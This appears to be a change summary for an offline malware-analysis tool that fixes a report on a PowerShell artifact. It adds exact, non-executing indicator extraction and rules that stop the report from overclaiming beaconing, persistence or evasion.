A live report on `peXF7I6W.ps1` wrote the hostname one character wrong — `gibuyuy` for `gibuzuy` — and overclaimed: a single fetch called beaconing, a written-then-deleted staging file called persistence, dead time arithmetic read as evasion, and "fetch the payload" proposed as the next step of an offline analysis. Ground truth from the bytes supports none of those.

**Exact half, read not retyped.** New `## Verified indicators` section: absolute URIs from the artifact and from each deterministic stage, with authority/path/query/provenance/digest. Literal matching only — no network, no execution, nothing labelled.

Because a wrong value under a "verified" heading is worse than the error it replaces: `,` and `;` inside a URI are kept (legal characters; cutting there attests a truncation), while the same character in final position is prose. Non-UTF-8 artifacts are read as UTF-16 in both byte orders or not at all — decoding with replacement would put U+FFFD into a string called exact.

**Interpretive half, disciplined not automated.** The report contract states when beaconing/persistence are earned, that writing a file is staging unless its location is what runs it, that timing and deletion are described factually, and that an offline session's next step must be locally actionable. Names no artifact, no technique; pinned by the drift guard.

No change to EvidenceStore, context admission, compaction, duplicate suppression, deobfuscation, KV or MTP. Duplicate-evidence audit: the two records per action (`_raw` + bounded observation) are independent under existing provenance and only the observation is citable — no fix warranted.

Full suite 4168 OK (skipped=8). Review returned 1 BLOCKER (URI truncation at `,`/`;`), 3 MAJOR (mojibake indicators; UTF-16 silently missed; self-referential bound test) and 2 MINOR — all reproduced and fixed, each pinned by test. Two further defects found while probing (authority mislabelled as host, dropping userinfo/port; IPv6 literals missed) fixed the same way.
